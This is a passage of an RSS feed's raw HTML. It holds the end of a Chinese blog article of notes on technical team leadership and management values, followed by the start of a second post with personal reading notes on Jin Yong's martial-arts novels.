src="https://wechat2rss.xlab.app/img-proxy/?k=6596dcd4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX77AdV36jLibDvC6azKWr9O1YzVibY5Ba419QD0wvmkc0iadoxCHfvKwkKQ%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><br/></section><h1 style="line-height: 1.75em;"><br/></h1><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="line-height: 1.75em;margin-bottom: 5px;"><span style="color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-size: 24px;font-family: 等线;">0x06 成长路径</span></strong></span><br/></h1><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">1.《最重要的事只有一件》</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">a)现在信息太多，获取信息渠道也非常多，多做减法。</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">b)专注和体系，有时候不一定完全界定的非常好，毕竟做的都是自认为的。单位时间vs最大化的博弈。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">2.价值观强而业绩弱，只能说明能力已经触达其天花板</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">3.搭团队，要注重补短板；而用人，恰恰要取长板</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">4.不患寡而患不均</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">a)例如奖金分配</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">5.激励手段和方法不能一概而论，要单独为团队成员</span><span style="font-family:等线;font-weight:bold;">量身定做</span><span style="font-family:等线;">激励方案。</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">a)每个人所处阶段不同，需求也不同，并不是所有的都得靠钱来满足。毕竟资源也是有限的。</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">b)例如马斯洛层次需求理论。荣誉有时候也很关键。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">6.资源是相互吸引的，你想要资源，首先自己也得有资源</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">7.发挥自己的长板，让别人补足你的短板，这就是现代的木桶理论。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">8.当他有一个特别强有力的锤子的时候，他把什么东西都当钉子看，其实有时候我们需要的可能不是一个锤子，而是一个扳手。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">9.只有让团队成员之间了解除了工作以外的其他信息，才可能产生信任</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">10.996是路径 不是目的，但目的达成不一定都要996；科学的判断为前提；但加班的确是态度友好的一种明显展示。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">11.打造一个团队，首先应该关注于凝聚力，然后才是团队绩效</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">12.尽快淘汰不认可公司价值观的员工，不论职位高低。因为他们的存在对于整个团队士气有不可估量的后果，职位越高，后果越严重。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">13.发现一个问题，解决一类问题，其实，把这句话做逻辑分解是：发现一个问题，进行归纳建模，抽象成这类问题的普遍特征，然后，设计软件模型，统一解决它。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">14.目的是沟通的核心，不是吵架；起到关键作用的并非沟通技巧，而是你对他的影响力。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">15.NLP教练技术一个核心原则：</span><span style="font-family:等线;font-weight:bold;">每个行为背后都有一个正向的动机。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">16.生活就是这样，如果你不主动去争取你想要的，你就不得不接受一些你并不想要的。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">17.世界已经进入 VUCA 时代，我们正面临一个易变的、不确定的、复杂的、模糊的世界；每个组织与个人都有一种对未来不确定的恐慌感，长远规划越来越成为不可靠的事。不可不靠计划，也不可太靠计划，但主线必须明确，例如OKR 的关键还是O，不一定非得KR全满足才叫优秀。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="356" data-backw="553" data-ratio="0.64376130198915" style="width: 100%;height: auto;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=9b22f13a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX7c0SvUOy1ML8NlbicUJJTumicThDN9F9UXCgT0Lzmic8kbQvBefhn9lcLQ%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="351" data-backw="553" data-ratio="0.6347197106690777" style="width: 100%;height: auto;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=ca0d1d84&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX7rCsoqP5EysCNsibFxD5l7ZDjEf22DUrHMOCdSq6cJ4cuPUY3xic7z4Pw%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><h1 style="line-height: 1.75em;"><br/></h1><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="line-height: 1.75em;margin-bottom: 5px;"><span style="color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-size: 24px;font-family: 等线;">0x07 管理意识</span></strong></span><br/></h1><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">1.管理是一种实践，其本质不在于“知”，而在于“行”，（（Management is practice. Its essence is not knowing but doing.））其验证不在于逻辑，而在于成果，其唯一权威就是成就。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">2.管理的本质是激发人的善意和潜能。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">3.世界属于热情而又有动力的领导者，这些人不仅自身具有很多能量，而且能激发那些被领导者的能量</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">4.团队核心，创造公平、公正的环境。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">5.在向上管理上，彼得·德鲁克还认为，有效的管理者了解他的上司也是普通人，肯定有其长处和短处。如果能在上司的长处上下功夫，协助他做好工作，便能在帮助上司的同时也带动下属自己。要使上司发挥所长，不能靠唯命是从，应该从正确的事情着手，并以上司能够接受的方式向其提出建议</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">6.管理思维</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">a)服务思维：很多时候领导就是团队的粘合剂，要有为团队服务的意识；</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">b)全局观念：要站在更高层次看待问题，不断引进比我们更优秀的人加入公司，学会“像 CEO 一样思考”；</span></section><section style="margin-left: 42pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">c)不断学习：随着公司业务拓展，对各种能力的要求也越来越高，技术管理者也需要与时俱进，不断学习充电，比如订阅极客时间专栏。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="308" data-backw="553" data-ratio="0.5569620253164557" style="width: 100%;height: auto;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=1f7be760&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX7jzl1hkzC2kbQ6GoiaSKYyGbo3mbCEuldToMY7iaFc0cxEEqpoy0Dz89g%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="line-height: 1.75em;margin-bottom: 5px;"><span style="color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-family: 等线;font-size: 24px;">0x08 文化价值观</span></strong></span><br/></h1><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;"><span style="font-family: 等线;">以前对文化价值观不是很关注，觉得口号居多。但后来的历史的大数据给了启示：现在绝大多数对金钱的追逐，还是比较渴望，包括对金钱的传承。但，自古以来，企图给孩子留下一笔钱，梦想让孩子也可以富贵逍遥的人，基本上没有实现的，相反，那些留下良好习惯、家风的家族 却可昌盛多年。例如曾国藩（家书、冰鉴）。（</span><span style="font-family: 等线;font-style: italic;">自行搜索曾国藩的后代</span><span style="font-family: 等线;">）</span></span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">1.文化的力量就是榜样的力量，我们要把文化作为一种习惯固化下来。同时，文化的力量是伟大的，也最能体现领导力的力量。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">2.价值观就是做事的原则，有所为而有所不为。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">3.价值观解决了“不是一家人不进一家门”的问题，也可以理解为恋爱或者家庭的三观是否合的问题。</span></section><section style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-family:等线;">4.个人行为，不是为了迎合某某企业文化，更多的是自己想做事所背后依托的底层原理，例如奋斗进取、持续创新。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="571" data-backw="553" data-ratio="1.0325497287522605" style="width: 100%;height: auto;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=38cbcfb6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX7YKPlge1fKtSUmVfGEWtVB85S0QqLViczBEeoObEEWMCwA2huIBpOezg%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="line-height: 1.75em;margin-bottom: 5px;"><span style="color: rgb(2, 30, 170);"><strong><span style="color: rgb(2, 30, 170);font-family: 等线;font-size: 24px;">0x09 后记</span></strong></span><br/></h1><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">以上内容大多都是书上的内容（部分原创<span style="font-family: 等线;text-indent: 28px;">）</span>。多翻了几本书找了一些自己觉得认可的观点，做了一些整合和关联分析。虽然学了很多，但实践应用还差火候，距离今年最强单脑的三度（决策有广度、认知有高度、思维有深度）还差之甚远。</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">重点参考内容如下：</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">《技术领导力实战笔记》- 极客时间</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">《技术领导力：程序员如何才能带团队》- 周明耀</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">《知行-技术人的管理之路》- 刘建国</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;">《可复制的领导力》-樊登</span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><img class="rich_pages wxw-img" data-backh="452" data-backw="553" data-ratio="0.8173598553345389" style="width: 100%;height: auto;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=cd0cadfe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtIjL4YGe8jdbICeDpIibZXX7Ld440epJaibRvDR1VicmkuSiaUCV0cXSTS3sL4RUj8GLKgnaJFbUhBqcg%2F640%3Fwx_fmt%3Dpng"/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section><section style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family:等线;"><br/></span></section>



<p><a href="2247483874">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4ace28b4&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483874%26idx%3D1%26sn%3D3d39988460f702190e7893967480bf6b%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 31 Jan 2022 06:25:00 +0800</pubDate>
    </item>
    <item>
      <title>金庸武侠赏析 (随记版)</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483839&amp;idx=1&amp;sn=b5a653c90025f3b445a376703a4275b8</link>
      <description>中秋翻完了《六神磊磊读金庸》，趁着国庆闭环输出些内容。</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2021-10-07 23:08</span> <span style="display: inline-block;"></span>
</p>

<p>中秋翻完了《六神磊磊读金庸》，趁着国庆闭环输出些内容。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=37142f4d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40k7Am3J3Bm9976K0LPwbgLSIg5icdp0shopqckVvx7XsT1qh65tS7mOw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="font-size: 24px;"><strong>一、写在前面</strong></span><br/></p><h1 style="margin-top: 17pt;margin-bottom: 16.5pt;text-align: left;margin-left: 0pt;text-indent: 0pt;break-after: avoid;font-size: 22pt;font-family: 宋体;line-height: 1.5em;"><span style="font-family:宋体;"></span></h1><p>1. 中秋翻完了《六神磊磊读金庸》，趁着国庆闭环输出些内容。</p><p style="line-height: 1.75em;">2. 有些水煮三国的味道，诙谐风趣，部分不失客观。当然也有个人主观之意</p><p>3. 开篇的序以<strong>怜我世人</strong>为主题（焚我残躯,熊熊烈火.生亦何欢,死亦何苦.为善除恶,惟光明故.喜乐悲愁,皆归尘土.怜我世人,忧患实多.怜我世人,忧患实多.《倚天屠龙记》）</p><p>4. 书的写作来源主要是公众号的集合，去掉了之前的广告，关联逻辑主要是按照金庸的小说来写，重笔墨还是<strong>射雕三部曲</strong>。</p><p>5. 部分观点分析的很独到，思考深度以及分析视角值得学习。<span style="font-family:宋体;"></span></p><p style="mso-style-parent: &#39;&#39;;margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: 150%;font-size: 12.0pt;font-family: 宋体;font-weight: normal;"><span style="font-family:宋体;"><shape type="#_x0000_t75" filled="f" style="text-indent:0;left:0;width:414.99997pt;height:294.85pt;"><imagedata title="image1"></imagedata></shape><img data-ratio="0.7106690777576854" style="width:553.3400268554688px;height:393.1400146484375px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=da02c229&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40WnicLUoCIBdSlh1vib8G2aRuY0rMrjMmCMcv4iaRicfBtMkUMyRp55ibxwQ%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-family:宋体;"></span></p><p style="mso-style-parent: &#39;&#39;;margin-top: 0.0pt;margin-bottom: 0.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: 150%;font-size: 12.0pt;font-family: 宋体;font-weight: normal;"><span style="font-family:宋体;"><br/></span></p><h1 style=""><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">二、观点赏析</span></strong></span></h1><p>1. 金庸三个成功的笨人。郭靖、狄云、石破天</p><p>2. 天龙八部五个爹，慕容博-权利；萧远山-斗争；段正淳-淫荡；玄慈-避责；游驹-反智（不会独立思考，盾在人在，就死了）；天龙也是一部坑儿史、找爹史</p><p>3. 慕容复交友bug，只会下交，不会平交（只要别人高过了他，他就不自在，吆喝人闹别扭）</p><p>4. 江湖群众只能识别普通的恶人，是识别不出大恶人的；除非中小学课本告诉他们（丁春秋被关押；慕容博成为佛门弟子。慕容博的罪恶可比丁春秋大的多。）</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.728" data-s="300,640" style="" data-type="png" data-w="1250" src="https://wechat2rss.xlab.app/img-proxy/?k=beb26a47&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40JTHn0JmBh51xgxfDBLfCelBkNBicj6YQQ1B8P8ohSHxq7wvI9orWGzg%2F640%3Fwx_fmt%3Dpng"/></p><p>5. 一个人太过容易地赢得大众的崇拜，往往就<strong>自我感觉良好</strong>，失去了下一个目标。</p><p><em>例如（武修文、武敦儒，丘处机七子之冠）（有时候一个平庸的集体反而会让人失去进取心）相反，杨过这个年轻人从来都是有危机感，一直觉得自己武功不行，不断地反思和创新。</em></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.559322033898305" data-s="300,640" style="" data-type="png" data-w="1416" src="https://wechat2rss.xlab.app/img-proxy/?k=648adfd5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40syHtpaqkKOE5UA9PemwLpibRE28wDkUIc57BfOadSPibRraKLhDdyeqA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p>6. 孩子倘若太早学会取悦和迎合大人，<strong>“优秀”得太容易</strong>，习惯性地走捷径，往往就不会再踏踏实实用功。（杨康）</p><p>7. 郭靖后来的蜕变，起因都是李萍，李萍对孩子的爱带有父爱和母爱双重性质。她虽然没给孩子半点武功，却奠定了他<strong>三观</strong>的底色，给了他忠厚的品性与博大的胸襟，让他有通往伟大的可能。</p><p><img data-ratio="0.5551537070524413" style="width:553.3400268554688px;height:307.4700012207031px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=40469cce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40kEcs63905wh1FNq9WyLGmM7UfbeDFyicc4MMyUCFtdW5Ggw9ICymODA%2F640%3Fwx_fmt%3Dpng"/></p><p><em>PS:现在有一批普通农村家庭的孩子考出了清华北大（小概率），并不是因为家长交给多少学科知识，而是正确的基础三观（例如脚踏实地、吃苦耐劳）。（</em><span style="color: rgb(255, 76, 0);"><em><strong>母系性格的影响成长史</strong></em></span><em>）</em></p><p><em><br/></em></p><p>8. 金轮法王，人物写砸了。这个坏人没有什么欲望和追求。</p><p>欧阳锋为了追武学、左冷禅任我行追权柄；金轮也不是践行某个价值观，也不是为了报恩。金轮法王就是一个小职员，认真的打工。</p><p><em>PS：工作的<strong>三个基础需求</strong>（求钱、求权利、求知遇（环境））</em></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.9876325088339223" data-s="300,640" style="" data-type="png" data-w="1132" src="https://wechat2rss.xlab.app/img-proxy/?k=c3f8e491&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40zjaq8LAGgCdNiaSQSpDM0UUMJndgC08Ln1ZjiahQsGebBSseaeSbcLfg%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p>9. 笑傲江湖，任我行质问下属。升的好快啊。你是武功高强呢，还是办事能干？</p><p>10. 一篇精彩的领导江湖---丐帮梁长老（三个关键词：<strong>白发如银、腰板挺直、精神矍铄</strong>）</p><p>讲话的四部分</p><p>    a.凭什么是我这个老朽在这里讲（合法性）</p><p>    b. 捧人，捧黄蓉</p><p>    c.卸力（捧起来了，需要说明为什么不，黄蓉为什不回来呢？因为辅佐郭靖襄阳）</p><p>    d.重大决定，比武夺位</p><p>    调侃的是自己，提醒的是别人别放肆（君山大会-黄蓉）</p><p>11. 明教崇尚生活简谱，食菜事魔，教规很严，按理说连吃肉都不能吃，更要干驱除鞑子的大业，理应<strong>艰苦卓绝</strong>才对。（赵敏绿柳山庄请客吃饭的艺术）</p><p><em style="white-space: normal;">PS：同理，干大业与艰苦的 正相关吗？基本上也没有听说过享受着把大业完成了。</em></p><p><img data-ratio="0.6256781193490054" style="width:553.3400268554688px;height:346.07000732421875px;" data-type="png" data-w="553" src="https://wechat2rss.xlab.app/img-proxy/?k=e3f26e3b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs405KQTwcAENbYtQj4bCY8yZibYGwApf5lHTw2IrzpsV4qib5sMPD0GE0nw%2F640%3Fwx_fmt%3Dpng"/></p><p><em>SO？团队是领导的影子（镜子），</em><span style="color: rgb(255, 76, 0);"><em>不一定是苦行，而是一种自我激励</em></span><em>。</em></p><p><em>分享一段王沪宁同志的一段笔记（</em><a href="https://mp.weixin.qq.com/s?__biz=MzI2NTQ0MjUxNQ==&amp;mid=2247499794&amp;idx=2&amp;sn=d30c819379c86d9dc4d3eac6a1e6a16d&amp;scene=21#wechat_redirect" data-linktype="2"><em>王沪宁《政治的人生》的25句话</em></a><em>）</em></p><p><span style="font-size: 14px;"><em>我们这类人，已经习惯了无幸福的生活，也就是生活的平淡，没有幸福的欲望，也就没有痛苦。痛苦往往是伴随着对幸福的追求的，而不是伴随着幸福本身。所以要怀疑的不是幸福本身，而是每个人主观状态中的希望。我的问题还是：“和尚为什么要念经？”这个问题能够回答，一切就归于平淡。叫做和平养无限天机。幸福之事，可遇而不可求，可求而不可执。修炼了这么多年，有足够的空间在心中，无所谓幸福。当然我不反对他人追求幸福，因为人不可能过同样的生活。</em></span></p><p><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><br/>12. 张召</span>重<span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">，技术人员转型。　一个人只要被打了标签，就会给人以刻板印象，就会有软肋，就会有破绽。比如</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;color: rgb(255, 76, 0);"><strong>“技术出身”</strong></span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">说明书生气、大局观不行、领导能力差；“明星”可能表明爱出风头不脚踏实地；“年轻”表明坐火箭、蹿升快、欠历练，都不是好事。</span><br/></p><p>13. 有时候，办事越是坚持原则，越是处于答疑和公信，越不溜须拍马，反而越容易得到别人尊重。</p><p>14. 金庸小说的爱情，经常有一个规律：逆取者胜，顺守者败。更主动一点的会赢得胜利。所以温青青胜、阿九败；赵敏胜、周芷若败；杨逍胜，殷梨亭败；韦小宝胜、郑克爽败。</p><p><em style="white-space: normal;">PS：当然也有一个客观规律，大多数初恋不是最终的对象。</em></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5913555992141454" data-s="300,640" style="" data-type="png" data-w="1018" src="https://wechat2rss.xlab.app/img-proxy/?k=d0d300c1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLh5cWYibIgqLibglctwhWs40Y3qHbxiafNTXjWHx0nspKIO2k0kM7ND5Tdey2byKWndES2fnhkzh7CQ%2F640%3Fwx_fmt%3Dpng"/></p><p><em><br/></em></p><p>15. 侠客行 和 连城诀这两本书是相反的。在狄云的眼里江湖全都是坏人、从石破天的眼里全都是好人；侠客行的前一本天龙八部是浪漫主义的高峰；下一本书是笑傲江湖是讽刺现实的极致。</p><p>16. 侠客行 类似童话，告诉我们一个道理，在一个复杂的世界里，做聪明人无疑是好事，但在一个过于复杂的世界里。如果你的天赋、性格实在不适合做聪明人，那么不要勉强去做，做一个笨蛋或许也是不坏的选择。</p><p>17.《太玄经》这就是金庸提出的“经典困境”：到最后最权威的不是经典，而是对经典的解释。</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7278481012658228" data-s="300,640" style="" data-type="png" data-w="1264" 